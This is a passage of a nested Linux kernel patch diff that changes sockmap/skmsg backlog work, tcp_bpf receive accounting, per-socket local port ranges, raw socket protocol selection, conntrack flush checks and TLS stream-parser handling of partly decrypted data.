+ 				sk_psock_clear_state(psock, SK_PSOCK_TX_ENABLED);
+-				sock_drop(psock->sk, skb);
+ 				goto end;
+ 			}
+ 			off += ret;
+ 			len -= ret;
+ 		} while (len);
+ 
+-		if (!ingress)
++		skb = skb_dequeue(&psock->ingress_skb);
++		if (!ingress) {
+ 			kfree_skb(skb);
++		}
+ 	}
+ end:
+ 	mutex_unlock(&psock->work_mutex);
+@@ -733,7 +727,7 @@ struct sk_psock *sk_psock_init(struct sock *sk, int node)
+ 	INIT_LIST_HEAD(&psock->link);
+ 	spin_lock_init(&psock->link_lock);
+ 
+-	INIT_WORK(&psock->work, sk_psock_backlog);
++	INIT_DELAYED_WORK(&psock->work, sk_psock_backlog);
+ 	mutex_init(&psock->work_mutex);
+ 	INIT_LIST_HEAD(&psock->ingress_msg);
+ 	spin_lock_init(&psock->ingress_lock);
+@@ -785,11 +779,6 @@ static void __sk_psock_zap_ingress(struct sk_psock *psock)
+ 		skb_bpf_redirect_clear(skb);
+ 		sock_drop(psock->sk, skb);
+ 	}
+-	kfree_skb(psock->work_state.skb);
+-	/* We null the skb here to ensure that calls to sk_psock_backlog
+-	 * do not pick up the free'd skb.
+-	 */
+-	psock->work_state.skb = NULL;
+ 	__sk_psock_purge_ingress_msg(psock);
+ }
+ 
+@@ -808,7 +797,6 @@ void sk_psock_stop(struct sk_psock *psock)
+ 	spin_lock_bh(&psock->ingress_lock);
+ 	sk_psock_clear_state(psock, SK_PSOCK_TX_ENABLED);
+ 	sk_psock_cork_free(psock);
+-	__sk_psock_zap_ingress(psock);
+ 	spin_unlock_bh(&psock->ingress_lock);
+ }
+ 
+@@ -822,7 +810,8 @@ static void sk_psock_destroy(struct work_struct *work)
+ 
+ 	sk_psock_done_strp(psock);
+ 
+-	cancel_work_sync(&psock->work);
++	cancel_delayed_work_sync(&psock->work);
++	__sk_psock_zap_ingress(psock);
+ 	mutex_destroy(&psock->work_mutex);
+ 
+ 	psock_progs_drop(&psock->progs);
+@@ -937,7 +926,7 @@ static int sk_psock_skb_redirect(struct sk_psock *from, struct sk_buff *skb)
+ 	}
+ 
+ 	skb_queue_tail(&psock_other->ingress_skb, skb);
+-	schedule_work(&psock_other->work);
++	schedule_delayed_work(&psock_other->work, 0);
+ 	spin_unlock_bh(&psock_other->ingress_lock);
+ 	return 0;
+ }
+@@ -989,10 +978,8 @@ static int sk_psock_verdict_apply(struct sk_psock *psock, struct sk_buff *skb,
+ 		err = -EIO;
+ 		sk_other = psock->sk;
+ 		if (sock_flag(sk_other, SOCK_DEAD) ||
+-		    !sk_psock_test_state(psock, SK_PSOCK_TX_ENABLED)) {
+-			skb_bpf_redirect_clear(skb);
++		    !sk_psock_test_state(psock, SK_PSOCK_TX_ENABLED))
+ 			goto out_free;
+-		}
+ 
+ 		skb_bpf_set_ingress(skb);
+ 
+@@ -1017,22 +1004,23 @@ static int sk_psock_verdict_apply(struct sk_psock *psock, struct sk_buff *skb,
+ 			spin_lock_bh(&psock->ingress_lock);
+ 			if (sk_psock_test_state(psock, SK_PSOCK_TX_ENABLED)) {
+ 				skb_queue_tail(&psock->ingress_skb, skb);
+-				schedule_work(&psock->work);
++				schedule_delayed_work(&psock->work, 0);
+ 				err = 0;
+ 			}
+ 			spin_unlock_bh(&psock->ingress_lock);
+-			if (err < 0) {
+-				skb_bpf_redirect_clear(skb);
++			if (err < 0)
+ 				goto out_free;
+-			}
+ 		}
+ 		break;
+ 	case __SK_REDIRECT:
++		tcp_eat_skb(psock->sk, skb);
+ 		err = sk_psock_skb_redirect(psock, skb);
+ 		break;
+ 	case __SK_DROP:
+ 	default:
+ out_free:
++		skb_bpf_redirect_clear(skb);
++		tcp_eat_skb(psock->sk, skb);
+ 		sock_drop(psock->sk, skb);
+ 	}
+ 
+@@ -1048,7 +1036,7 @@ static void sk_psock_write_space(struct sock *sk)
+ 	psock = sk_psock(sk);
+ 	if (likely(psock)) {
+ 		if (sk_psock_test_state(psock, SK_PSOCK_TX_ENABLED))
+-			schedule_work(&psock->work);
++			schedule_delayed_work(&psock->work, 0);
+ 		write_space = psock->saved_write_space;
+ 	}
+ 	rcu_read_unlock();
+@@ -1077,8 +1065,7 @@ static void sk_psock_strp_read(struct strparser *strp, struct sk_buff *skb)
+ 		skb_dst_drop(skb);
+ 		skb_bpf_redirect_clear(skb);
+ 		ret = bpf_prog_run_pin_on_cpu(prog, skb);
+-		if (ret == SK_PASS)
+-			skb_bpf_set_strparser(skb);
++		skb_bpf_set_strparser(skb);
+ 		ret = sk_psock_map_verd(ret, skb_bpf_redirect_fetch(skb));
+ 		skb->sk = NULL;
+ 	}
+@@ -1180,12 +1167,11 @@ static int sk_psock_verdict_recv(struct sock *sk, struct sk_buff *skb)
+ 	int ret = __SK_DROP;
+ 	int len = skb->len;
+ 
+-	skb_get(skb);
+-
+ 	rcu_read_lock();
+ 	psock = sk_psock(sk);
+ 	if (unlikely(!psock)) {
+ 		len = 0;
++		tcp_eat_skb(sk, skb);
+ 		sock_drop(sk, skb);
+ 		goto out;
+ 	}
+@@ -1209,10 +1195,19 @@ out:
+ static void sk_psock_verdict_data_ready(struct sock *sk)
+ {
+ 	struct socket *sock = sk->sk_socket;
++	int copied;
+ 
+ 	if (unlikely(!sock || !sock->ops || !sock->ops->read_skb))
+ 		return;
+-	sock->ops->read_skb(sk, sk_psock_verdict_recv);
++	copied = sock->ops->read_skb(sk, sk_psock_verdict_recv);
++	if (copied >= 0) {
++		struct sk_psock *psock;
++
++		rcu_read_lock();
++		psock = sk_psock(sk);
++		psock->saved_data_ready(sk);
++		rcu_read_unlock();
++	}
+ }
+ 
+ void sk_psock_start_verdict(struct sock *sk, struct sk_psock *psock)
+diff --git a/net/core/sock_map.c b/net/core/sock_map.c
+index a68a7290a3b2b..d382672018928 100644
+--- a/net/core/sock_map.c
++++ b/net/core/sock_map.c
+@@ -1624,9 +1624,10 @@ void sock_map_close(struct sock *sk, long timeout)
+ 		rcu_read_unlock();
+ 		sk_psock_stop(psock);
+ 		release_sock(sk);
+-		cancel_work_sync(&psock->work);
++		cancel_delayed_work_sync(&psock->work);
+ 		sk_psock_put(sk, psock);
+ 	}
++
+ 	/* Make sure we do not recurse. This is a bug.
+ 	 * Leak the socket instead of crashing on a stack overflow.
+ 	 */
+diff --git a/net/ipv4/inet_connection_sock.c b/net/ipv4/inet_connection_sock.c
+index 7152ede18f115..916075e00d066 100644
+--- a/net/ipv4/inet_connection_sock.c
++++ b/net/ipv4/inet_connection_sock.c
+@@ -117,7 +117,7 @@ bool inet_rcv_saddr_any(const struct sock *sk)
+ 	return !sk->sk_rcv_saddr;
+ }
+ 
+-void inet_get_local_port_range(struct net *net, int *low, int *high)
++void inet_get_local_port_range(const struct net *net, int *low, int *high)
+ {
+ 	unsigned int seq;
+ 
+@@ -130,6 +130,27 @@ void inet_get_local_port_range(struct net *net, int *low, int *high)
+ }
+ EXPORT_SYMBOL(inet_get_local_port_range);
+ 
++void inet_sk_get_local_port_range(const struct sock *sk, int *low, int *high)
++{
++	const struct inet_sock *inet = inet_sk(sk);
++	const struct net *net = sock_net(sk);
++	int lo, hi, sk_lo, sk_hi;
++
++	inet_get_local_port_range(net, &lo, &hi);
++
++	sk_lo = inet->local_port_range.lo;
++	sk_hi = inet->local_port_range.hi;
++
++	if (unlikely(lo <= sk_lo && sk_lo <= hi))
++		lo = sk_lo;
++	if (unlikely(lo <= sk_hi && sk_hi <= hi))
++		hi = sk_hi;
++
++	*low = lo;
++	*high = hi;
++}
++EXPORT_SYMBOL(inet_sk_get_local_port_range);
++
+ static bool inet_use_bhash2_on_bind(const struct sock *sk)
+ {
+ #if IS_ENABLED(CONFIG_IPV6)
+@@ -316,7 +337,7 @@ inet_csk_find_open_port(const struct sock *sk, struct inet_bind_bucket **tb_ret,
+ ports_exhausted:
+ 	attempt_half = (sk->sk_reuse == SK_CAN_REUSE) ? 1 : 0;
+ other_half_scan:
+-	inet_get_local_port_range(net, &low, &high);
++	inet_sk_get_local_port_range(sk, &low, &high);
+ 	high++; /* [32768, 60999] -> [32768, 61000[ */
+ 	if (high - low < 4)
+ 		attempt_half = 0;
+diff --git a/net/ipv4/inet_hashtables.c b/net/ipv4/inet_hashtables.c
+index f0750c06d5ffc..e8734ffca85a8 100644
+--- a/net/ipv4/inet_hashtables.c
++++ b/net/ipv4/inet_hashtables.c
+@@ -1022,7 +1022,7 @@ int __inet_hash_connect(struct inet_timewait_death_row *death_row,
+ 
+ 	l3mdev = inet_sk_bound_l3mdev(sk);
+ 
+-	inet_get_local_port_range(net, &low, &high);
++	inet_sk_get_local_port_range(sk, &low, &high);
+ 	high++; /* [32768, 60999] -> [32768, 61000[ */
+ 	remaining = high - low;
+ 	if (likely(remaining > 1))
+diff --git a/net/ipv4/ip_sockglue.c b/net/ipv4/ip_sockglue.c
+index 6e19cad154f5c..a7fd035b5b4f9 100644
+--- a/net/ipv4/ip_sockglue.c
++++ b/net/ipv4/ip_sockglue.c
+@@ -317,7 +317,14 @@ int ip_cmsg_send(struct sock *sk, struct msghdr *msg, struct ipcm_cookie *ipc,
+ 			ipc->tos = val;
+ 			ipc->priority = rt_tos2priority(ipc->tos);
+ 			break;
+-
++		case IP_PROTOCOL:
++			if (cmsg->cmsg_len != CMSG_LEN(sizeof(int)))
++				return -EINVAL;
++			val = *(int *)CMSG_DATA(cmsg);
++			if (val < 1 || val > 255)
++				return -EINVAL;
++			ipc->protocol = val;
++			break;
+ 		default:
+ 			return -EINVAL;
+ 		}
+@@ -922,6 +929,7 @@ int do_ip_setsockopt(struct sock *sk, int level, int optname,
+ 	case IP_CHECKSUM:
+ 	case IP_RECVFRAGSIZE:
+ 	case IP_RECVERR_RFC4884:
++	case IP_LOCAL_PORT_RANGE:
+ 		if (optlen >= sizeof(int)) {
+ 			if (copy_from_sockptr(&val, optval, sizeof(val)))
+ 				return -EFAULT;
+@@ -1364,6 +1372,20 @@ int do_ip_setsockopt(struct sock *sk, int level, int optname,
+ 		WRITE_ONCE(inet->min_ttl, val);
+ 		break;
+ 
++	case IP_LOCAL_PORT_RANGE:
++	{
++		const __u16 lo = val;
++		const __u16 hi = val >> 16;
++
++		if (optlen != sizeof(__u32))
++			goto e_inval;
++		if (lo != 0 && hi != 0 && lo > hi)
++			goto e_inval;
++
++		inet->local_port_range.lo = lo;
++		inet->local_port_range.hi = hi;
++		break;
++	}
+ 	default:
+ 		err = -ENOPROTOOPT;
+ 		break;
+@@ -1742,6 +1764,12 @@ int do_ip_getsockopt(struct sock *sk, int level, int optname,
+ 	case IP_MINTTL:
+ 		val = inet->min_ttl;
+ 		break;
++	case IP_LOCAL_PORT_RANGE:
++		val = inet->local_port_range.hi << 16 | inet->local_port_range.lo;
++		break;
++	case IP_PROTOCOL:
++		val = inet_sk(sk)->inet_num;
++		break;
+ 	default:
+ 		sockopt_release_sock(sk);
+ 		return -ENOPROTOOPT;
+diff --git a/net/ipv4/raw.c b/net/ipv4/raw.c
+index af03aa8a8e513..86197634dcf5d 100644
+--- a/net/ipv4/raw.c
++++ b/net/ipv4/raw.c
+@@ -530,6 +530,9 @@ static int raw_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 	}
+ 
+ 	ipcm_init_sk(&ipc, inet);
++	/* Keep backward compat */
++	if (hdrincl)
++		ipc.protocol = IPPROTO_RAW;
+ 
+ 	if (msg->msg_controllen) {
+ 		err = ip_cmsg_send(sk, msg, &ipc, false);
+@@ -597,7 +600,7 @@ static int raw_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 
+ 	flowi4_init_output(&fl4, ipc.oif, ipc.sockc.mark, tos,
+ 			   RT_SCOPE_UNIVERSE,
+-			   hdrincl ? IPPROTO_RAW : sk->sk_protocol,
++			   hdrincl ? ipc.protocol : sk->sk_protocol,
+ 			   inet_sk_flowi_flags(sk) |
+ 			    (hdrincl ? FLOWI_FLAG_KNOWN_NH : 0),
+ 			   daddr, saddr, 0, 0, sk->sk_uid);
+diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
+index 1fb67f819de49..021a8bf6a1898 100644
+--- a/net/ipv4/tcp.c
++++ b/net/ipv4/tcp.c
+@@ -1570,7 +1570,7 @@ static int tcp_peek_sndq(struct sock *sk, struct msghdr *msg, int len)
+  * calculation of whether or not we must ACK for the sake of
+  * a window update.
+  */
+-static void __tcp_cleanup_rbuf(struct sock *sk, int copied)
++void __tcp_cleanup_rbuf(struct sock *sk, int copied)
+ {
+ 	struct tcp_sock *tp = tcp_sk(sk);
+ 	bool time_to_ack = false;
+@@ -1772,7 +1772,6 @@ int tcp_read_skb(struct sock *sk, skb_read_actor_t recv_actor)
+ 		WARN_ON_ONCE(!skb_set_owner_sk_safe(skb, sk));
+ 		tcp_flags = TCP_SKB_CB(skb)->tcp_flags;
+ 		used = recv_actor(sk, skb);
+-		consume_skb(skb);
+ 		if (used < 0) {
+ 			if (!copied)
+ 				copied = used;
+@@ -1786,14 +1785,6 @@ int tcp_read_skb(struct sock *sk, skb_read_actor_t recv_actor)
+ 			break;
+ 		}
+ 	}
+-	WRITE_ONCE(tp->copied_seq, seq);
+-
+-	tcp_rcv_space_adjust(sk);
+-
+-	/* Clean up data we have read: This will do ACK frames. */
+-	if (copied > 0)
+-		__tcp_cleanup_rbuf(sk, copied);
+-
+ 	return copied;
+ }
+ EXPORT_SYMBOL(tcp_read_skb);
+diff --git a/net/ipv4/tcp_bpf.c b/net/ipv4/tcp_bpf.c
+index 2e9547467edbe..5f93918c063c7 100644
+--- a/net/ipv4/tcp_bpf.c
++++ b/net/ipv4/tcp_bpf.c
+@@ -11,6 +11,24 @@
+ #include <net/inet_common.h>
+ #include <net/tls.h>
+ 
++void tcp_eat_skb(struct sock *sk, struct sk_buff *skb)
++{
++	struct tcp_sock *tcp;
++	int copied;
++
++	if (!skb || !skb->len || !sk_is_tcp(sk))
++		return;
++
++	if (skb_bpf_strparser(skb))
++		return;
++
++	tcp = tcp_sk(sk);
++	copied = tcp->copied_seq + skb->len;
++	WRITE_ONCE(tcp->copied_seq, copied);
++	tcp_rcv_space_adjust(sk);
++	__tcp_cleanup_rbuf(sk, skb->len);
++}
++
+ static int bpf_tcp_ingress(struct sock *sk, struct sk_psock *psock,
+ 			   struct sk_msg *msg, u32 apply_bytes, int flags)
+ {
+@@ -174,14 +192,34 @@ static int tcp_msg_wait_data(struct sock *sk, struct sk_psock *psock,
+ 	return ret;
+ }
+ 
++static bool is_next_msg_fin(struct sk_psock *psock)
++{
++	struct scatterlist *sge;
++	struct sk_msg *msg_rx;
++	int i;
++
++	msg_rx = sk_psock_peek_msg(psock);
++	i = msg_rx->sg.start;
++	sge = sk_msg_elem(msg_rx, i);
++	if (!sge->length) {
++		struct sk_buff *skb = msg_rx->skb;
++
++		if (skb && TCP_SKB_CB(skb)->tcp_flags & TCPHDR_FIN)
++			return true;
++	}
++	return false;
++}
++
+ static int tcp_bpf_recvmsg_parser(struct sock *sk,
+ 				  struct msghdr *msg,
+ 				  size_t len,
+ 				  int flags,
+ 				  int *addr_len)
+ {
++	struct tcp_sock *tcp = tcp_sk(sk);
++	u32 seq = tcp->copied_seq;
+ 	struct sk_psock *psock;
+-	int copied;
++	int copied = 0;
+ 
+ 	if (unlikely(flags & MSG_ERRQUEUE))
+ 		return inet_recv_error(sk, msg, len, addr_len);
+@@ -194,8 +232,43 @@ static int tcp_bpf_recvmsg_parser(struct sock *sk,
+ 		return tcp_recvmsg(sk, msg, len, flags, addr_len);
+ 
+ 	lock_sock(sk);
++
++	/* We may have received data on the sk_receive_queue pre-accept and
++	 * then we can not use read_skb in this context because we haven't
++	 * assigned a sk_socket yet so have no link to the ops. The work-around
++	 * is to check the sk_receive_queue and in these cases read skbs off
++	 * queue again. The read_skb hook is not running at this point because
++	 * of lock_sock so we avoid having multiple runners in read_skb.
++	 */
++	if (unlikely(!skb_queue_empty(&sk->sk_receive_queue))) {
++		tcp_data_ready(sk);
++		/* This handles the ENOMEM errors if we both receive data
++		 * pre accept and are already under memory pressure. At least
++		 * let user know to retry.
++		 */
++		if (unlikely(!skb_queue_empty(&sk->sk_receive_queue))) {
++			copied = -EAGAIN;
++			goto out;
++		}
++	}
++
+ msg_bytes_ready:
+ 	copied = sk_msg_recvmsg(sk, psock, msg, len, flags);
++	/* The typical case for EFAULT is the socket was gracefully
++	 * shutdown with a FIN pkt. So check here the other case is
++	 * some error on copy_page_to_iter which would be unexpected.
++	 * On fin return correct return code to zero.
++	 */
++	if (copied == -EFAULT) {
++		bool is_fin = is_next_msg_fin(psock);
++
++		if (is_fin) {
++			copied = 0;
++			seq++;
++			goto out;
++		}
++	}
++	seq += copied;
+ 	if (!copied) {
+ 		long timeo;
+ 		int data;
+@@ -233,6 +306,10 @@ msg_bytes_ready:
+ 		copied = -EAGAIN;
+ 	}
+ out:
++	WRITE_ONCE(tcp->copied_seq, seq);
++	tcp_rcv_space_adjust(sk);
++	if (copied > 0)
++		__tcp_cleanup_rbuf(sk, copied);
+ 	release_sock(sk);
+ 	sk_psock_put(sk, psock);
+ 	return copied;
+diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c
+index 2eaf47e23b221..956d6797c76f3 100644
+--- a/net/ipv4/udp.c
++++ b/net/ipv4/udp.c
+@@ -243,7 +243,7 @@ int udp_lib_get_port(struct sock *sk, unsigned short snum,
+ 		int low, high, remaining;
+ 		unsigned int rand;
+ 
+-		inet_get_local_port_range(net, &low, &high);
++		inet_sk_get_local_port_range(sk, &low, &high);
+ 		remaining = (high - low) + 1;
+ 
+ 		rand = get_random_u32();
+@@ -1806,7 +1806,7 @@ EXPORT_SYMBOL(__skb_recv_udp);
+ int udp_read_skb(struct sock *sk, skb_read_actor_t recv_actor)
+ {
+ 	struct sk_buff *skb;
+-	int err, copied;
++	int err;
+ 
+ try_again:
+ 	skb = skb_recv_udp(sk, MSG_DONTWAIT, &err);
+@@ -1825,10 +1825,7 @@ try_again:
+ 	}
+ 
+ 	WARN_ON_ONCE(!skb_set_owner_sk_safe(skb, sk));
+-	copied = recv_actor(sk, skb);
+-	kfree_skb(skb);
+-
+-	return copied;
++	return recv_actor(sk, skb);
+ }
+ EXPORT_SYMBOL(udp_read_skb);
+ 
+diff --git a/net/ipv6/raw.c b/net/ipv6/raw.c
+index f44b99f7ecdcc..33852fc38ad91 100644
+--- a/net/ipv6/raw.c
++++ b/net/ipv6/raw.c
+@@ -791,7 +791,8 @@ static int rawv6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 
+ 		if (!proto)
+ 			proto = inet->inet_num;
+-		else if (proto != inet->inet_num)
++		else if (proto != inet->inet_num &&
++			 inet->inet_num != IPPROTO_RAW)
+ 			return -EINVAL;
+ 
+ 		if (proto > 255)
+diff --git a/net/netfilter/nf_conntrack_netlink.c b/net/netfilter/nf_conntrack_netlink.c
+index cb4325b8ebb11..857cddd9d82e5 100644
+--- a/net/netfilter/nf_conntrack_netlink.c
++++ b/net/netfilter/nf_conntrack_netlink.c
+@@ -1559,9 +1559,6 @@ static const struct nla_policy ct_nla_policy[CTA_MAX+1] = {
+ 
+ static int ctnetlink_flush_iterate(struct nf_conn *ct, void *data)
+ {
+-	if (test_bit(IPS_OFFLOAD_BIT, &ct->status))
+-		return 0;
+-
+ 	return ctnetlink_filter_match(ct, data);
+ }
+ 
+@@ -1631,11 +1628,6 @@ static int ctnetlink_del_conntrack(struct sk_buff *skb,
+ 
+ 	ct = nf_ct_tuplehash_to_ctrack(h);
+ 
+-	if (test_bit(IPS_OFFLOAD_BIT, &ct->status)) {
+-		nf_ct_put(ct);
+-		return -EBUSY;
+-	}
+-
+ 	if (cda[CTA_ID]) {
+ 		__be32 id = nla_get_be32(cda[CTA_ID]);
+ 
+diff --git a/net/sctp/socket.c b/net/sctp/socket.c
+index 17185200079d5..bc3d08bd7cef3 100644
+--- a/net/sctp/socket.c
++++ b/net/sctp/socket.c
+@@ -8325,7 +8325,7 @@ static int sctp_get_port_local(struct sock *sk, union sctp_addr *addr)
+ 		int low, high, remaining, index;
+ 		unsigned int rover;
+ 
+-		inet_get_local_port_range(net, &low, &high);
++		inet_sk_get_local_port_range(sk, &low, &high);
+ 		remaining = (high - low) + 1;
+ 		rover = prandom_u32_max(remaining) + low;
+ 
+diff --git a/net/tls/tls.h b/net/tls/tls.h
+index 0e840a0c3437b..17737a65c643a 100644
+--- a/net/tls/tls.h
++++ b/net/tls/tls.h
+@@ -165,6 +165,11 @@ static inline bool tls_strp_msg_ready(struct tls_sw_context_rx *ctx)
+ 	return ctx->strp.msg_ready;
+ }
+ 
++static inline bool tls_strp_msg_mixed_decrypted(struct tls_sw_context_rx *ctx)
++{
++	return ctx->strp.mixed_decrypted;
++}
++
+ #ifdef CONFIG_TLS_DEVICE
+ int tls_device_init(void);
+ void tls_device_cleanup(void);
+diff --git a/net/tls/tls_device.c b/net/tls/tls_device.c
+index a7cc4f9faac28..bf69c9d6d06c0 100644
+--- a/net/tls/tls_device.c
++++ b/net/tls/tls_device.c
+@@ -1007,20 +1007,14 @@ int tls_device_decrypted(struct sock *sk, struct tls_context *tls_ctx)
+ 	struct tls_sw_context_rx *sw_ctx = tls_sw_ctx_rx(tls_ctx);
+ 	struct sk_buff *skb = tls_strp_msg(sw_ctx);
+ 	struct strp_msg *rxm = strp_msg(skb);
+-	int is_decrypted = skb->decrypted;
+-	int is_encrypted = !is_decrypted;
+-	struct sk_buff *skb_iter;
+-	int left;
+-
+-	left = rxm->full_len - skb->len;
+-	/* Check if all the data is decrypted already */
+-	skb_iter = skb_shinfo(skb)->frag_list;
+-	while (skb_iter && left > 0) {
+-		is_decrypted &= skb_iter->decrypted;
+-		is_encrypted &= !skb_iter->decrypted;
+-
+-		left -= skb_iter->len;
+-		skb_iter = skb_iter->next;
++	int is_decrypted, is_encrypted;
++
++	if (!tls_strp_msg_mixed_decrypted(sw_ctx)) {
++		is_decrypted = skb->decrypted;
++		is_encrypted = !is_decrypted;
++	} else {
++		is_decrypted = 0;
++		is_encrypted = 0;
+ 	}
+ 
+ 	trace_tls_device_decrypted(sk, tcp_sk(sk)->copied_seq - rxm->full_len,
+diff --git a/net/tls/tls_strp.c b/net/tls/tls_strp.c
+index 955ac3e0bf4d3..da95abbb7ea32 100644
+--- a/net/tls/tls_strp.c
++++ b/net/tls/tls_strp.c
+@@ -29,34 +29,50 @@ static void tls_strp_anchor_free(struct tls_strparser *strp)
+ 	struct skb_shared_info *shinfo = skb_shinfo(strp->anchor);
+ 
+ 	DEBUG_NET_WARN_ON_ONCE(atomic_read(&shinfo->dataref) != 1);
+-	shinfo->frag_list = NULL;
++	if (!strp->copy_mode)
++		shinfo->frag_list = NULL;
+ 	consume_skb(strp->anchor);
+ 	strp->anchor = NULL;
+ }
+ 
+-/* Create a new skb with the contents of input copied to its page frags */
+-static struct sk_buff *tls_strp_msg_make_copy(struct tls_strparser *strp)
++static struct sk_buff *
++tls_strp_skb_copy(struct tls_strparser *strp, struct sk_buff *in_skb,
++		  int offset, int len)
+ {
+-	struct strp_msg *rxm;
+ 	struct sk_buff *skb;
+-	int i, err, offset;
++	int i, err;
+ 
+-	skb = alloc_skb_with_frags(0, strp->stm.full_len, TLS_PAGE_ORDER,
++	skb = alloc_skb_with_frags(0, len, TLS_PAGE_ORDER,
+ 				   &err, strp->sk->sk_allocation);
+ 	if (!skb)
+ 		return NULL;
+ 
+-	offset = strp->stm.offset;
+ 	for (i = 0; i < skb_shinfo(skb)->nr_frags; i++) {
+ 		skb_frag_t *frag = &skb_shinfo(skb)->frags[i];
+ 
+-		WARN_ON_ONCE(skb_copy_bits(strp->anchor, offset,
++		WARN_ON_ONCE(skb_copy_bits(in_skb, offset,
+ 					   skb_frag_address(frag),
+ 					   skb_frag_size(frag)));
+ 		offset += skb_frag_size(frag);
+ 	}
+ 
+-	skb_copy_header(skb, strp->anchor);
++	skb->len = len;
++	skb->data_len = len;
++	skb_copy_header(skb, in_skb);
++	return skb;
++}
++
++/* Create a new skb with the contents of input copied to its page frags */
++static struct sk_buff *tls_strp_msg_make_copy(struct tls_strparser *strp)
++{
++	struct strp_msg *rxm;
++	struct sk_buff *skb;
++
++	skb = tls_strp_skb_copy(strp, strp->anchor, strp->stm.offset,
++				strp->stm.full_len);
++	if (!skb)
++		return NULL;
++
+ 	rxm = strp_msg(skb);
+ 	rxm->offset = 0;
+ 	return skb;
+@@ -180,22 +196,22 @@ static void tls_strp_flush_anchor_copy(struct tls_strparser *strp)
+ 	for (i = 0; i < shinfo->nr_frags; i++)
+ 		__skb_frag_unref(&shinfo->frags[i], false);
+ 	shinfo->nr_frags = 0;
++	if (strp->copy_mode) {
++		kfree_skb_list(shinfo->frag_list);
++		shinfo->frag_list = NULL;
++	}
+ 	strp->copy_mode = 0;
++	strp->mixed_decrypted = 0;
+ }
+ 
+-static int tls_strp_copyin(read_descriptor_t *desc, struct sk_buff *in_skb,
+-			   unsigned int offset, size_t in_len)
++static int tls_strp_copyin_frag(struct tls_strparser *strp, struct sk_buff *skb,
++				struct sk_buff *in_skb, unsigned int offset,
++				size_t in_len)
+ {
+-	struct tls_strparser *strp = (struct tls_strparser *)desc->arg.data;
+-	struct sk_buff *skb;
+-	skb_frag_t *frag;
+ 	size_t len, chunk;
++	skb_frag_t *frag;
+ 	int sz;
+ 
+-	if (strp->msg_ready)
+-		return 0;
+-
+-	skb = strp->anchor;
+ 	frag = &skb_shinfo(skb)->frags[skb->len / PAGE_SIZE];
+ 
+ 	len = in_len;
+@@ -208,19 +224,26 @@ static int tls_strp_copyin(read_descriptor_t *desc, struct sk_buff *in_skb,
+ 					   skb_frag_size(frag),
+ 					   chunk));
+ 
+-		sz = tls_rx_msg_size(strp, strp->anchor);
+-		if (sz < 0) {
+-			desc->error = sz;
+-			return 0;
+-		}
+-
+-		/* We may have over-read, sz == 0 is guaranteed under-read */
+-		if (sz > 0)
+-			chunk =	min_t(size_t, chunk, sz - skb->len);
+-
+ 		skb->len += chunk;
+ 		skb->data_len += chunk;
+ 		skb_frag_size_add(frag, chunk);
++
++		sz = tls_rx_msg_size(strp, skb);
++		if (sz < 0)
++			return sz;
++
++		/* We may have over-read, sz == 0 is guaranteed under-read */
++		if (unlikely(sz && sz < skb->len)) {
++			int over = skb->len - sz;
++
++			WARN_ON_ONCE(over > chunk);
++			skb->len -= over;
++			skb->data_len -= over;
++			skb_frag_size_add(frag, -over);
++
++			chunk -= over;
++		}
++
+ 		frag++;
+ 		len -= chunk;
+ 		offset += chunk;
+@@ -247,15 +270,99 @@ static int tls_strp_copyin(read_descriptor_t *desc, struct sk_buff *in_skb,
+ 		offset += chunk;
+ 	}
+ 
+-	if (strp->stm.full_len == skb->len) {
++read_done:
++	return in_len - len;
++}
++
++static int tls_strp_copyin_skb(struct tls_strparser *strp, struct sk_buff *skb,
++			       struct sk_buff *in_skb, unsigned int offset,
++			       size_t in_len)
++{
++	struct sk_buff *nskb, *first, *last;
++	struct skb_shared_info *shinfo;
++	size_t chunk;
++	int sz;
++
++	if (strp->stm.full_len)
++		chunk = strp->stm.full_len - skb->len;
++	else
++		chunk = TLS_MAX_PAYLOAD_SIZE + PAGE_SIZE;
++	chunk = min(chunk, in_len);
++
++	nskb = tls_strp_skb_copy(strp, in_skb, offset, chunk);
++	if (!nskb)
++		return -ENOMEM;
++
++	shinfo = skb_shinfo(skb);
++	if (!shinfo->frag_list) {
++		shinfo->frag_list = nskb;
++		nskb->prev = nskb;
++	} else {
++		first = shinfo->frag_list;
++		last = first->prev;
++		last->next = nskb;
++		first->prev = nskb;
++	}
++
++	skb->len += chunk;
++	skb->data_len += chunk;
++
++	if (!strp->stm.full_len) {
++		sz = tls_rx_msg_size(strp, skb);
++		if (sz < 0)
++			return sz;
++
++		/* We may have over-read, sz == 0 is guaranteed under-read */
++		if (unlikely(sz && sz < skb->len)) {
++			int over = skb->len - sz;
++
++			WARN_ON_ONCE(over > chunk);
++			skb->len -= over;
++			skb->data_len -= over;
++			__pskb_trim(nskb, nskb->len - over);
++
++			chunk -= over;
++		}
++
++		strp->stm.full_len = sz;
++	}
++
++	return chunk;
++}
++
++static int tls_strp_copyin(read_descriptor_t *desc, struct sk_buff *in_skb,
++			   unsigned int offset, size_t in_len)
++{
++	struct tls_strparser *strp = (struct tls_strparser *)desc->arg.data;
++	struct sk_buff *skb;
++	int ret;
++
++	if (strp->msg_ready)
++		return 0;
++
++	skb = strp->anchor;
++	if (!skb->len)
++		skb_copy_decrypted(skb, in_skb);
++	else
++		strp->mixed_decrypted |= !!skb_cmp_decrypted(skb, in_skb);
++
++	if (IS_ENABLED(CONFIG_TLS_DEVICE) && strp->mixed_decrypted)
++		ret = tls_strp_copyin_skb(strp, skb, in_skb, offset, in_len);
++	else
++		ret = tls_strp_copyin_frag(strp, skb, in_skb, offset, in_len);
++	if (ret < 0) {
++		desc->error = ret;
++		ret = 0;
++	}
++
++	if (strp->stm.full_len && strp->stm.full_len == skb->len) {
+ 		desc->count = 0;
+ 
+ 		strp->msg_ready = 1;
+ 		tls_rx_msg_ready(strp);
+ 	}
+ 
+-read_done:
+-	return in_len - len;
++	return ret;
+ }
+ 
+ static int tls_strp_read_copyin(struct tls_strparser *strp)
+@@ -315,15 +422,19 @@ static int tls_strp_read_copy(struct tls_strparser *strp, bool qshort)
+ 	return 0;
+ }
+ 
+-static bool tls_strp_check_no_dup(struct tls_strparser *strp)
++static bool tls_strp_check_queue_ok(struct tls_strparser *strp)
+ {
+ 	unsigned int len = strp->stm.offset + strp->stm.full_len;
+-	struct sk_buff *skb;
++	struct sk_buff *first, *skb;
+ 	u32 seq;
+ 
+-	skb = skb_shinfo(strp->anchor)->frag_list;
